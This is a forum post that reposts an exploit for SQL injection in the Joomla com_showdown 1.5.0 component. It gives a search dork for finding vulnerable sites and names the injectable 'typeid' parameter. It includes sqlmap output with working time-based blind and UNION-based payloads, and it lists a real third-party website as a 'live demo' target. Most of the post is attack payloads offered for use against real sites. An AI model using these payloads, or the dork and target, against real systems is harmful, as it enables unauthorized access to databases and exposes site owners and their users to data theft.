Jump to content
hades

[Joomla] Showdown 1.5.0 SQL Injection

By hades, in Exploituri

Recommended Posts

hades Newbie

hades

Posted
Posted 
######################
# Exploit Title : Joomla com_showdown SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_showdown
# version : 1.5.0
# Tested on: [ Windows 7 ]
# skype:xbadgirl21
# Date: 2016/07/24
# video Proof : https://youtu.be/IglNYsDcV3g
######################
# [+] DESCRIPTION :
######################
# [+] an SQL injection been Detected in this Joomla components showdown
 after you add ['] or ["] to
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that
corresponds to your MySQL or
# [+] You Will Notice a change in the Frontpage of the target .
######################
# [+] Poc :
######################
# [typeid] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE]
######################
# [+] SQLmap PoC:
######################
# GET parameter 'typeid' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
#
# Parameter: typeid (GET)
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind
#    Payload: option=com_showdown&typeid=11 AND SLEEP(5)
#
#    Type: UNION query
#    Title: Generic UNION query (NULL) - 6 columns
#    Payload: option=com_showdown&typeid=11 UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870
# 43554447614a527451564c,0x71706a7171),NULL-- LZga
# ---
# [12:59:46] [INFO] the back-end DBMS is MySQL
# web server operating system: Linux Debian 6.0 (squeeze)
# web application technology: PHP 5.2.6, Apache 2.2.16
# back-end DBMS: MySQL >= 5.0.12
# [12:59:46] [INFO] fetching database names
# available databases [3]:
######################
# [+] Live Demo :
######################
# http://www.circuse.eu/index.php?option=com_showdown&typeid=11
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
CommentsRSS Feed

 

via 

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...